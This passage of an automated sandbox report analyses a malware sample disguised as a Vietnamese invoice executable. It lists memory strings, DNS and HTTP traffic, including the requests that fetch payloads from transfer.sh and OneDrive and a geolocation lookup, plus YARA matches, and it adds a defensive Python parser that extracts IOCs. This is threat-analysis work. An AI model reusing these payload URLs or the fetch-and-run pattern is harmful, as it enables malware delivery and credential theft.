Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe String found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886%21122&authkey=AKVhH87
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://pki.goog/repository/0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://transfer.sh
Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp
Source: dwn.exe, 00000011.00000000.374284805.0000000000AE2000.00000002.00000001.01000000.00000009.sdmp, dwn.exe.12.dr, Cuhcxlcg[1].exe.12.dr String found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp%Pvdrkkndtbbqxgmhnq
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exe
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exeY
Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exen
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/
Source: aspnet_compiler.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/
Source: bhvF833.tmp.14.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhv8995.tmp.39.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: global traffic HTTP traffic detected:
    GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: transfer.sh
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1
    Host: transfer.sh
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1
    Host: kpf0yw.am.files.1drv.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: aspnet_compiler.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 14_2_0041183A
Source: Shhejayly.exe, 00000012.00000002.524974268.00000000007CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
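The four HTTP requests in this section (two transfer.sh fetches, the OneDrive-hosted Xqpxc.png and the geoplugin.net lookup) are the network IOCs a responder would pull from this report. What follows is an added example, not part of the sandbox report: a Python parser for the "HTTP traffic detected" entries in the form the sandbox emits them (request line and headers run together on one line), which splits each entry at known header names, rebuilds the request and tags it. The sample entries are constructed from the report's own lines; the host lists and tag names are this example's assumptions. The geoplugin.net tag rests on general knowledge that Remcos queries that service for the victim's public IP and country, not on anything the report states.

```python
"""
Pull network IOCs out of a sandbox report's flattened HTTP entries.

Added example, not part of the sandbox report. The sample entries below
are constructed from the report's own lines; the host lists and tag
names are this example's assumptions.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed from the report's "HTTP traffic detected" entries, kept in
# the form the sandbox emits: request line and headers on one line.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1"
    "Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; "
    "Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; "
    ".NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1"
    "Host: transfer.shConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1"
    "Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.net"
    "Cache-Control: no-cache",
    # A non-HTTP entry, included to show that it is ignored.
    "Source: unknown DNS traffic detected: queries for: onedrive.live.com",
]

PREFIX = "HTTP traffic detected: "
HEADER_NAMES = (
    "Accept", "Accept-Encoding", "Accept-Language", "User-Agent", "Host",
    "Connection", "Cache-Control", "Content-Type", "Content-Length",
    "Referer", "Cookie", "Pragma",
)
# Zero-width split points: the position just before a known "Name: ".
HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")

# Assumed host lists for tagging; file-sharing hosts seen in this report
# and the geolocation service Remcos is known to query.
PAYLOAD_HOSTS = ("transfer.sh", ".1drv.com")
IP_CHECK_HOSTS = ("geoplugin.net",)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict

    @property
    def host(self) -> str:
        return self.headers.get("Host", "")

    @property
    def user_agent(self) -> Optional[str]:
        return self.headers.get("User-Agent")


def parse_http_entry(line: str) -> Optional[HttpRequest]:
    """Turn one flattened 'HTTP traffic detected' entry into a request."""
    if PREFIX not in line:
        return None
    raw = line.split(PREFIX, 1)[1]
    parts = [p for p in HEADER_SPLIT.split(raw) if p]
    m = REQUEST_LINE.match(parts[0].strip())
    if not m:
        return None
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name] = value
    return HttpRequest(m["method"], m["path"], headers)


def classify(req: HttpRequest) -> set:
    """Heuristic tags for a request; the rules are this example's assumptions."""
    tags = set()
    if any(req.host == h or req.host.endswith(h) for h in PAYLOAD_HOSTS):
        tags.add("payload-download")
    if req.host in IP_CHECK_HOSTS:
        tags.add("ip-check")
    if req.user_agent is None:
        tags.add("no-user-agent")        # a browser would always send one
    if req.path.lower().split("?")[0].endswith((".bmp", ".png")):
        tags.add("image-named-fetch")    # image names fetched by a loader, not a browser
    return tags


def extract_iocs(lines) -> dict:
    """Hosts, URLs, user agents and per-URL tags across all HTTP entries."""
    requests = [r for r in map(parse_http_entry, lines) if r]
    return {
        "hosts": {r.host for r in requests},
        "urls": [f"{r.host}{r.path}" for r in requests],
        "user_agents": {r.user_agent for r in requests if r.user_agent},
        "tags": {f"{r.host}{r.path}": sorted(classify(r)) for r in requests},
    }


if __name__ == "__main__":
    for url, tags in extract_iocs(SAMPLE_LINES)["tags"].items():
        print(url, tags)
```

Only the first request carries a User-Agent, and it is the stock WinINet/Internet Explorer string; the later fetches send none at all, which is a cheap proxy-log discriminator for loader traffic versus a real browser.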

E-Banking Fraud

Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
